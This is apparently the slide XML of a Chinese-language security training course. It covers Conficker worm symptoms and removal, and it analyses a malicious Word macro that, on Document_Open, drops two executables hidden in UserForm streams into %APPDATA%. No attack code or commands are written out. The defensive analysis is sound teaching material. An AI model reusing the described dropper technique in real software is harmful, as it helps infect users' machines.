              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://www.84840.com/sd/index.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>下载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木马专杀工具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724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六、恶意样本处理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407047" y="1166842"/>
            <a:ext cx="107271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清除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>Conficker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>蠕虫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>2:(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>此方法适用于电脑管理人员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由赛门铁克诺顿提供</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>3.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>移除使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>W32.Downadup(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蠕虫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>移除工具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2"/>
              </a:rPr>
              <a:t>http://www.microsoft.com/taiwan/security/articles/msrt0114.mspx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r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>赛门铁克安全响应中心已经开发出一种清除工具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3"/>
              </a:rPr>
              <a:t>http://203.208.37.132/translate_c?hl=zh-CN&amp;sl=en&amp;u=http://www.symantec.com/business/security_response/writeup.jsp%3Fdocid=2009-011316-0247-99&amp;prev=/search?q=http://www.symantec.com/security_response/writeup.jsp%3Fdocid%3D2008-112203-2408-99%26tabid%3D3&amp;hl=zh-CN&amp;newwindow=1&amp;sa=G&amp;usg=ALkJrhjTHXuK4whe6PJIlZERFSiV7lKBJw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>来清理感染的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>W32.Downadup(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蠕虫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>。使用此删除工具首先，因为它是最简单的方法以消除这一威胁。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38411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一、介绍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911425" y="1304035"/>
            <a:ext cx="10173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Conficker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>症状</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>网络变慢</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>创建很多的计划任务</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>部分安全软件厂商网站无法打开，</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>某些微软</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>服务会被自动禁用。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	5.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>域控服务器对客户机请求回应变的缓慢。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="72600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六、恶意样本处理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407047" y="1166842"/>
            <a:ext cx="107271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3.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>手动移除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>Conficker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>蠕虫</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>以下说明涉及所有当前和最近的赛门铁克防病毒产品，包括利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Symantec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>AntiVirus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Norton </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>AntiVirus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的产品线。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	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禁用系统还原（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows Me</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>/ XP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>中）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更新的病毒定义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执行完整的系统扫描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删除任何值添加到注册表中</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1585406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七、预防与加固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1601366" y="2228671"/>
            <a:ext cx="10727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、打补丁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、加密码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、禁止</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>盘使用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2927419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050"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3311691" y="1124744"/>
            <a:ext cx="0" cy="4165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TextBox 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3791745" y="1858924"/>
            <a:ext cx="7200800" cy="204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工业环境中飞客蠕虫病毒事故分析与防范</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="26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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Office</a:t>
            </a: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</a:rPr>
              <a:t>恶意文件分析与防范</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2667" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/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WannaCry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中关于</a:t>
            </a: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MS17-010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漏洞利用分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="791411" y="1858923"/>
            <a:ext cx="2208245" cy="240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333" spc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教学大纲</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="5333" spc="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61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一、背景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519015" y="1547537"/>
            <a:ext cx="10727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近年来，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Office</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>文档攻击成为了不法分子利用最为频繁的攻击方式之一。典型的攻击方式为：攻击者借助欺骗性文字的邮件主题或正文，向受害者发送带有恶意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Office</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>附件的邮件，诱导其点击打开附件，在无需交互、用户无感知的情况下，执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Office</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>文档中内嵌的一段恶意代码，从远控地址中下载并运行恶意可执行程序，例如远控木马或者勒索病毒等。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由于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Office</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>是人们电脑上最常用的办公软件，这种攻击手法不仅给个人用户带来巨大的风险，同时也严重威胁着政府和企业的安全，危害巨大。攻击者一旦得手，则可能获取电脑的完全控制权限，不仅可以窃取电脑中存放的高度机密数据，还可以以该电脑作为跳板，进一步对同一网络中其它电脑进行攻击，甚至导致整个内网完全沦陷；同时也增加了勒索病毒攻击的风险，如果政府和企业的关键文档、数据、图片等被使用高强度算法加密，则受害者要么放弃这些数据，要么给攻击者支付价值不菲的赎金，造成的损失无法估量。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1768620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二、基本情况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519015" y="1547537"/>
            <a:ext cx="35230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某公司员工邮箱收到一封电子邮件，包含如下的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>WORD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>附件。文档打开后，显示如下图。内容就是一幅图片，提示要查看具体的传真内容要求用户启动宏。很明显，这是一个带有宏的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6602F5-81DD-41A1-9212-787A7218B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88" y="67204"/>
            <a:ext cx="8006573" cy="6723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674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二、基本情况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587709" y="906132"/>
            <a:ext cx="418956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在启用宏之后，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Word</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>1-2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>秒之后退出，再次打开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文档时，文档出现空白，没有上图中提示点击启用内容的图片。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在此期间，进程监控工具没有发现有恶意进程执行。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通过再次下载</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Word</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>附件与二次打开之后的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Word</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>文件比较，发现两个文档的大小有着明显的区别。原始文件大小为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>447KB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，二次打开之后文件大小变为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>21.5KB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>。很明显在文件打开启用内容之后释放了宏内容。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E7F11E-5864-4EF1-B545-4A4C218829ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5059436" y="742260"/>
            <a:ext cx="6932301" cy="5680730"/>
            <a:chOff x="5361946" y="1436687"/>
            <a:chExt cx="4862513" cy="3984625"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1026" name="图片 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FCF622A-DD1F-4013-B12E-9B4F4AD12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46" y="1436687"/>
              <a:ext cx="2339975" cy="397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5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AEC64AE-6DFC-45A4-98C6-6EF3ACA15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921" y="1436687"/>
              <a:ext cx="2522538" cy="398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4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三、提供样本的恶意宏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587709" y="906132"/>
            <a:ext cx="9636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首先利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>oletools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>系列工具分析并提取原始</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Word</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>文件的宏。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>原始</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Word</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>文件的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>MD5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>为：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>aab23055f489b5c1feca97a763ef808d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>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F64281-56F4-4AAA-BE5F-4E6129245750}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="2037877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Mraptor.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>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5002CC-CA9E-4AFD-B53D-C6564E083BE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1259632" y="4996056"/>
            <a:ext cx="9903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/>
              <a:t>mraptor.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>查看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文档是否包含恶意宏，如下图所示，原始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文档包含可疑宏。文档为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>格式文档（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>office 97-2003</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>），并且文档具有可自动执行、可写、以及可执行权限。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90F42-AE34-446F-BD0F-DB430A613E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3" y="2251760"/>
            <a:ext cx="8491060" cy="2526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782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三、提供样本的恶意宏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2855573" y="1353312"/>
            <a:ext cx="963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通过执行如下命令，程序输出了很长的一段字节流。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5002CC-CA9E-4AFD-B53D-C6564E083BE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="321139" y="2617937"/>
            <a:ext cx="4176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执行上图所示的命令后，部分输出如下图所示。可以看出，嵌入的宏执行了删除文件、通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>运行可执行文件，并且创建调用了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>CreateThead</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>函数创建线程等恶意操作。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olevba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>提取恶意宏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ADDED7-3E90-48FE-91CE-7B225CEDD3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00" y="1915805"/>
            <a:ext cx="8484816" cy="3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75B1F9-B5C3-4B89-BA07-74F5A9C402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36" y="611412"/>
            <a:ext cx="6857621" cy="5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9D11CFD-4F6D-4E40-9666-AE9711B4486F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="397721" y="5302615"/>
            <a:ext cx="4176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便于分析将上述结果输出到一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>vba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>文件中，至此，恶意宏提取完成。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25547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1278294" y="1142787"/>
            <a:ext cx="83975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从上述提取到的恶意宏文件中可以看出，在宏中包含了两个以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>4d5a9000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>开头的很长的一段字节流宏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>UserForm1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>UserForm2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>。很明显，这是两个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>PE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>文件。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>UserForm1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>UserForm2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>宏字节流入下图所示。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81F903-BF38-4DD2-AF68-38A1233E295B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1380930" y="2981684"/>
            <a:ext cx="9228811" cy="1764320"/>
            <a:chOff x="3460750" y="3194050"/>
            <a:chExt cx="5270500" cy="10075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003F4C-29C2-431E-8916-32DA58DA7B5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750" y="3194050"/>
              <a:ext cx="5270500" cy="4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E1BAF65-F053-4BBC-9749-25C6E8CC10D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750" y="3661889"/>
              <a:ext cx="5270500" cy="539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7E54993-C124-47D0-B54E-B9B61885A58A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5995335" y="510354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接下来对宏内部函数进行分析。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3888120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21139" y="2118422"/>
            <a:ext cx="452494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利用“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>Document_Open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>函数实现在文档打开的时候运行宏，函数具体内容如下图所示。首先判断“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>%APPDATA”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>目录下是否存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>lkn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>目录，如果已经存在表示已经感染过，直接退出；否则调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>HexToString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>函数分别释放</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>UserForm1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>UserForm2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的内容到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>%APPDATA%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>目录下的的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>werd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>wird.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>中，最后调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>finds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>函数。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Document_Open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CB08E0-E162-467D-BB0C-8D25E5D3F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99" y="2076434"/>
            <a:ext cx="6852752" cy="3529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3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二、事故环境分析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911425" y="1304035"/>
            <a:ext cx="1017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事故发生在一个生产现场环境中。在现场发现网络连接情况，出现了大量针对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>445</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>端口的网络扫描情况。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6BE77-9F37-47F0-BE26-93980CBD25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4" y="2135032"/>
            <a:ext cx="6978067" cy="447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194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21139" y="1927705"/>
            <a:ext cx="45249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finds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>函数主要分为四部分的功能，一是在</a:t>
